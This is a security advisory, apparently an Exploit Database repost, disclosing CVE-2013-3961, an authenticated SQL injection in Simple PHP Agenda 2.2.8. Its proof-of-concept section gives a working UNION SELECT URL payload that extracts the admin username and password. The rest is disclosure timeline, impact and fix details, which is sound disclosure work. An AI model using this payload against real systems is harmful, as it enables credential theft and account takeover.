Simple PHP Agenda 2.2.8 – ‘edit_event.php?eventid’ SQL Injection

• Exploit Database
• 34 阅读

• 作者： Anthony Dubuissez
  日期： 2013-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/26136/

• =============================================
  WEBERA ALERT ADVISORY 02
  - Discovered by: Anthony Dubuissez
  - Severity: high
  - CVE Request – 05/06/2013
  - CVE Assign – 06/06/2013
  - CVE Number – CVE-2013-3961
  - Vendor notification – 06/06/2013
  - Vendor reply – 10/06/2013
  - Public disclosure – 11/06/2013
  =============================================
  
  I. VULNERABILITY ————————-
  iSQL in php-agenda <= 2.2.8
  
  II. BACKGROUND ————————-
  Simple Php Agenda is « a simple agenda tool written in PHP with MySQL backend. An agenda tool accessible everywere 
  there’s internet ».
  
  III. DESCRIPTION ————————-
  Php-Agenda 2.2.8 and lower versions contain a flaw that allows an authenticated user iSQL attack. This flaw exists 
  because the application does not properly sanitize parameters (only rely on mysql_real_escape_string() funcion ) in the 
  edit_event.php file. This allows an attacker to create a specially crafted URL to dump multiple informations of the 
  databases content.
  A valid account is required.
  
  IV. PROOF OF CONCEPT ————————-
  dumping login and password of the first admin
  iSQL: 
  http://server/edit_event.php?eventid=1%20union%20select%201,2,3,username,password,6,7,8,9%20from%20users%20where%20userlevel=9%20limit%200,1
  
  V. BUSINESS IMPACT ————————-
  iSQL: We can get sensitive information with the vulnerabilities that can escalate to a complete administrator account.
  
  VI. SYSTEMS AFFECTED ————————-
  Php-Agenda 2.2.8 and lower versions
  
  VII. SOLUTION ————————-
  sanitize correctly the GET/POST parameter. (don’t rely on the mysql_real_escape_string() functions only…)
  
  VIII. REFERENCES ————————-
  http://www.webera.fr/advisory-02-php-agenda-isql-exploit/
  
  IX. CREDITS ————————- 
  the vulnerability has been discovered by Anthony Dubuissez (anthony (dot) dubuissez (at) webera (dot) fr).
  
  X. DISCLOSURE TIMELINE ————————-
  June 05, 2013: Vulnerability acquired by Webera
  June 06, 2013: Sent to vendor.
  June 10, 2013: Reply of vendor, vendor release bugfix in version 2.2.9
  June 11, 2013: Advisory published and sent to lists.
  
  XI. LEGAL NOTICES ————————-
  The information contained within this advisory is supplied « as-is » with no warranties or guarantees of fitness of use 
  or otherwise.Webera accepts no responsibility for any damage caused by the use or misuse of this information.
  
  XII. FOLLOW US ————————-
  You can follow Webera, news and security advisories at:
  On twitter : @erathemass